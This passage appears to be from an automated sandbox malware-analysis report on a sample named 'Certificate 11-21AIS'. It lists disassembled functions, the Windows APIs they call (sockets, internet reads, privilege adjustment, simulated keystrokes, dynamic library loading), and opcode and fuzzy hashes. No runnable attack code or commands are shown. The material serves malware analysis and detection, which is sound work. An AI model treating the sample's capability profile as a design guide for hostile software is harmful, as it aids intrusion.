                                                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00919296
                                                                              • WSAGetLastError.WSOCK32(00000000,00000000), ref: 009192B9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLastinet_addrsocket
                                                                              • String ID:
                                                                              • API String ID: 4170576061-0
                                                                              • Opcode ID: 47ce090322393cc1d309741d9d1461974b16c202248e36f718dc9393511b03fb
                                                                              • Instruction ID: b1a860b94fc08d8274c3d9e62054e04b1f46785d0609139e9733aaf190fb3467
                                                                              • Opcode Fuzzy Hash: 47ce090322393cc1d309741d9d1461974b16c202248e36f718dc9393511b03fb
                                                                              • Instruction Fuzzy Hash: 6B41DC74600204AFDB14AB688896F7EB7EDEF44324F04894DF956EB3C2CB749D018B92
                                                                              Function 0090EB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0090EB8A
                                                                              • _wcscmp.LIBCMT ref: 0090EBBA
                                                                              • _wcscmp.LIBCMT ref: 0090EBCF
                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0090EBE0
                                                                              • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0090EC0E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File_wcscmp$CloseFirstNext
                                                                              • String ID:
                                                                              • API String ID: 2387731787-0
                                                                              • Opcode ID: df4733442b82b8276682892ddc10cc7831a12cbb6c1ce154817c2d6d6e64f5e5
                                                                              • Instruction ID: 5ddb1c811af4d5fcab5ac249ebaf4997b73c341186fba2334d802b1429594817
                                                                              • Opcode Fuzzy Hash: df4733442b82b8276682892ddc10cc7831a12cbb6c1ce154817c2d6d6e64f5e5
                                                                              • Instruction Fuzzy Hash: 2441B0756047029FD708DF28C491E9AB3E8FF49324F10495EEA5ACB3A1DB32E940CB91
                                                                              Function 00928111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                              • String ID:
                                                                              • API String ID: 292994002-0
                                                                              • Opcode ID: 84fad565fb1ba8ede23b1c2896ae923101b471c9f755c865a47495e632d0ffe1
                                                                              • Instruction ID: baf830b413aa5c26b3755d83f5ec2b293ecf97e5d99989ef30990332dcfc93e3
                                                                              • Opcode Fuzzy Hash: 84fad565fb1ba8ede23b1c2896ae923101b471c9f755c865a47495e632d0ffe1
                                                                              • Instruction Fuzzy Hash: 9E11BF3530A2256FE7216F2AEC44F6FBB9DEF55760B050429F849D72C2CF34E91286A1
                                                                              Function 008C9B60 Relevance: 7.3, Strings: 5, Instructions: 1055COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                              • API String ID: 0-1546025612
                                                                              • Opcode ID: 28089be5aaee1b380a91d37043c6f3c141d18e4b7e307554afdb42f5a0a1fc12
                                                                              • Instruction ID: df0d6001fc9f8d38b32bd2fd18c9ea5b67c6d1eba8ca4d287dc59a8b28db159d
                                                                              • Opcode Fuzzy Hash: 28089be5aaee1b380a91d37043c6f3c141d18e4b7e307554afdb42f5a0a1fc12
                                                                              • Instruction Fuzzy Hash: 01926B71E0121ACBDF28CF58C884BADB7B5FB54318F15819AE85AEB280D771DD81CB91
                                                                              Function 008DE01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,008DE014,74DF0AE0,008DDEF1,0095DC38,?,?), ref: 008DE02C
                                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 008DE03E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                                                              • API String ID: 2574300362-192647395
                                                                              • Opcode ID: 12fe2f7b4ace44311c49e431c6ca925ade4ce2133f3c4c418c2a34725f9b4019
                                                                              • Instruction ID: 19336c168d982843c0d083f1476da169626a6c5dd16dc4c173042950499aff13
                                                                              • Opcode Fuzzy Hash: 12fe2f7b4ace44311c49e431c6ca925ade4ce2133f3c4c418c2a34725f9b4019
                                                                              • Instruction Fuzzy Hash: 4DD0A739528B129FC7355F60EC08A1277D4FF05304F18841AE885D2650E7B4CC80C760
                                                                              Function 009013CA Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 009013DC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: lstrlen
                                                                              • String ID: ($|
                                                                              • API String ID: 1659193697-1631851259
                                                                              • Opcode ID: 5fda6c4b5b51706ead70fb68d07d3b5f0711f2a83d254fd9005fddfb8302123f
                                                                              • Instruction ID: 146a0ec2754792908242eec0605bd6a1b10cdcaefbed8e8bb54dfef66f61a12a
                                                                              • Opcode Fuzzy Hash: 5fda6c4b5b51706ead70fb68d07d3b5f0711f2a83d254fd9005fddfb8302123f
                                                                              • Instruction Fuzzy Hash: 66322575A007059FC728CF69C480A6AB7F5FF48320B15C56EE59ADB3A2E770E981CB44
                                                                              Function 008DB11F Relevance: 4.9, APIs: 3, Instructions: 377COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 008DB34E: GetWindowLongW.USER32(?,000000EB), ref: 008DB35F
                                                                              • DefDlgProcW.USER32(?,?,?,?,?), ref: 008DB22F
                                                                                • Part of subcall function 008DB55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 008DB5A5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Proc$LongWindow
                                                                              • String ID:
                                                                              • API String ID: 2749884682-0
                                                                              • Opcode ID: 0e8600d8998358a7c9d913ed34ae0f6411eda3ed3db47f3e4d16f884b04bf1ea
                                                                              • Instruction ID: aa82dd595e74ece963af05283368b1be30af6a90f934b04ab73f04e0124b68a9
                                                                              • Opcode Fuzzy Hash: 0e8600d8998358a7c9d913ed34ae0f6411eda3ed3db47f3e4d16f884b04bf1ea
                                                                              • Instruction Fuzzy Hash: F5A14771118109FADB286A6A5C98E7F3B6CFB96368F12432FF441D23D5DB249C01A672
                                                                              Function 00914EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,009143BF,00000000), ref: 00914FA6
                                                                              • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00914FD2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Internet$AvailableDataFileQueryRead
                                                                              • String ID:
                                                                              • API String ID: 599397726-0
                                                                              • Opcode ID: aad8f5919e48d1ddbac8e84617e2e437600bf3a9b9cf73a9e681593ba22a2583
                                                                              • Instruction ID: dc4cc17b8f6e7aaf0ecb7ad018501346be7063e07a18863bde1c84a90156d986
                                                                              • Opcode Fuzzy Hash: aad8f5919e48d1ddbac8e84617e2e437600bf3a9b9cf73a9e681593ba22a2583
                                                                              • Instruction Fuzzy Hash: FF41C7B170460DFFEB20DE94DC85EFF77BCEB84764F10406AF605A6281DA719E8196A0
                                                                              Function 0090E1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0090E20D
                                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0090E267
                                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0090E2B4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$DiskFreeSpace
                                                                              • String ID:
                                                                              • API String ID: 1682464887-0
                                                                              • Opcode ID: 98a444c59f6d9e0c7d35eae018eb708708f76c036bab7105356bc85340eb0ebf
                                                                              • Instruction ID: f40d5b7d5f4f115616b626953cfafe6271aa8d767d77bfe90154b6884444cabe
                                                                              • Opcode Fuzzy Hash: 98a444c59f6d9e0c7d35eae018eb708708f76c036bab7105356bc85340eb0ebf
                                                                              • Instruction Fuzzy Hash: AE213C75A10218EFCB00EFA9D885EADFBB8FF49310F0484AAE945E7391DB319915CB51
                                                                              Function 008FB134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 008DF4EA: std::exception::exception.LIBCMT ref: 008DF51E
                                                                                • Part of subcall function 008DF4EA: __CxxThrowException@8.LIBCMT ref: 008DF533
                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008FB180
                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008FB1AD
                                                                              • GetLastError.KERNEL32 ref: 008FB1BA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                              • String ID:
                                                                              • API String ID: 1922334811-0
                                                                              • Opcode ID: 9c2affe18922faf0db5c7299e117a764e50d2f38786e98f84a6a8181662efc3e
                                                                              • Instruction ID: da9ec689f16347e31a12e5d11c4d3a45da7fe65cada9275ae2f87039b1d84de9
                                                                              • Opcode Fuzzy Hash: 9c2affe18922faf0db5c7299e117a764e50d2f38786e98f84a6a8181662efc3e
                                                                              • Instruction Fuzzy Hash: 4F119EB2514209AFE728AF68DCC5D2BB7BDFF44714B20852EE55697241DB70FC818B60
                                                                              Function 00906685 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 009066AF
                                                                              • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 009066EC
                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 009066F5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CloseControlCreateDeviceFileHandle
                                                                              • String ID:
                                                                              • API String ID: 33631002-0
                                                                              • Opcode ID: 4085f0f1b20976779de64ee26883a1d5aefe04a98eba163d0269f1376d5eed1a
                                                                              • Instruction ID: 448b0e91459c550f2aad9c239c089f73a6b4020504b374fa05394a8bb727c076
                                                                              • Opcode Fuzzy Hash: 4085f0f1b20976779de64ee26883a1d5aefe04a98eba163d0269f1376d5eed1a
                                                                              • Instruction Fuzzy Hash: 0011A1B5915228BEE7118BA8DC49FAFBBBCEB09718F104556F901E71D0C3B4AE0487A1
                                                                              Function 009071FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00907223
                                                                              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0090723A
                                                                              • FreeSid.ADVAPI32(?), ref: 0090724A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                              • String ID:
                                                                              • API String ID: 3429775523-0
                                                                              • Opcode ID: d121f77c389cce7fbe623e2074a0fc7a385974f16b3fb792d8b5e436a6448553
                                                                              • Instruction ID: 4c4edd7e768881d89659b047e01d67e8554d239732e58b9165a8cee01523819c
                                                                              • Opcode Fuzzy Hash: d121f77c389cce7fbe623e2074a0fc7a385974f16b3fb792d8b5e436a6448553
                                                                              • Instruction Fuzzy Hash: 85F01D7AA15209BFDF04DFE4DD89EEEBBBCEF09201F104469A602E3191E2709A449B10
                                                                              Function 0090F56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0090F599
                                                                              • FindClose.KERNEL32(00000000), ref: 0090F5C9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Find$CloseFileFirst
                                                                              • String ID:
                                                                              • API String ID: 2295610775-0
                                                                              • Opcode ID: 158e4c367f4220a5d41b1bc3f2d8205e4b679f3bcbb450ab7ada37c8e075d5ac
                                                                              • Instruction ID: 1ed6569eca03b85137ed024a3496595895f1d34a0fb090f0cf992a9240f4de19
                                                                              • Opcode Fuzzy Hash: 158e4c367f4220a5d41b1bc3f2d8205e4b679f3bcbb450ab7ada37c8e075d5ac
                                                                              • Instruction Fuzzy Hash: 5A11A1716142009FD714EF28D845A2EB3E8FF99324F008A1EF9A5D7391CB30AD008B81
                                                                              Function 0090CE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0091BE6A,?,?,00000000,?), ref: 0090CEA7
                                                                              • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0091BE6A,?,?,00000000,?), ref: 0090CEB9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFormatLastMessage
                                                                              • String ID:
                                                                              • API String ID: 3479602957-0
                                                                              • Opcode ID: f8802c09ca24519a159caabed0d24a5054facb35d85234cdfe0b44bcbac04c7c
                                                                              • Instruction ID: 2a1584b9c91fc98018d495f158e4b3c983a6dfcbe9e719b31f8eb13bfb7b803b
                                                                              • Opcode Fuzzy Hash: f8802c09ca24519a159caabed0d24a5054facb35d85234cdfe0b44bcbac04c7c
                                                                              • Instruction Fuzzy Hash: 73F0EC79100229ABDB20AFA4CC48FEB336DFF0A3A0F008225F919D2081C630DA00CBA1
                                                                              Function 0090411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00904153
                                                                              • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00904166
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: InputSendkeybd_event
                                                                              • String ID:
                                                                              • API String ID: 3536248340-0
                                                                              • Opcode ID: 12b85f307946953d39e141383152a1fb4d5deba174b71835beef771c73722d2f
                                                                              • Instruction ID: a992c22794ad7f9ca9a885a1320c8e6629ef481b45fabc4929cd18c25291f8db
                                                                              • Opcode Fuzzy Hash: 12b85f307946953d39e141383152a1fb4d5deba174b71835beef771c73722d2f
                                                                              • Instruction Fuzzy Hash: 0BF09A7492834DAFDB058FA0C805BBE7FB4EF10305F00840AF966AA192D779C612DFA0
                                                                              Function 008FAB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,008FACC0), ref: 008FAB99
                                                                              • CloseHandle.KERNEL32(?,?,008FACC0), ref: 008FABAB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AdjustCloseHandlePrivilegesToken
                                                                              • String ID:
                                                                              • API String ID: 81990902-0
                                                                              • Opcode ID: e7b19a6db78b5b2d63a84ad90a02043321c4e9e1574f13124a1df3d321351ef4
                                                                              • Instruction ID: 5a023725a484da3bc793b2c94e6ac6b594015fb5cc2b06952b09be2653f39f04
                                                                              • Opcode Fuzzy Hash: e7b19a6db78b5b2d63a84ad90a02043321c4e9e1574f13124a1df3d321351ef4
                                                                              • Instruction Fuzzy Hash: BBE0E675015510AFE7252F64FC05D7777F9FF043207108529F95AC1571D7626C90EB51
                                                                              Function 008E81AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,008E6DB3,-0000031A,?,?,00000001), ref: 008E81B1
                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 008E81BA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
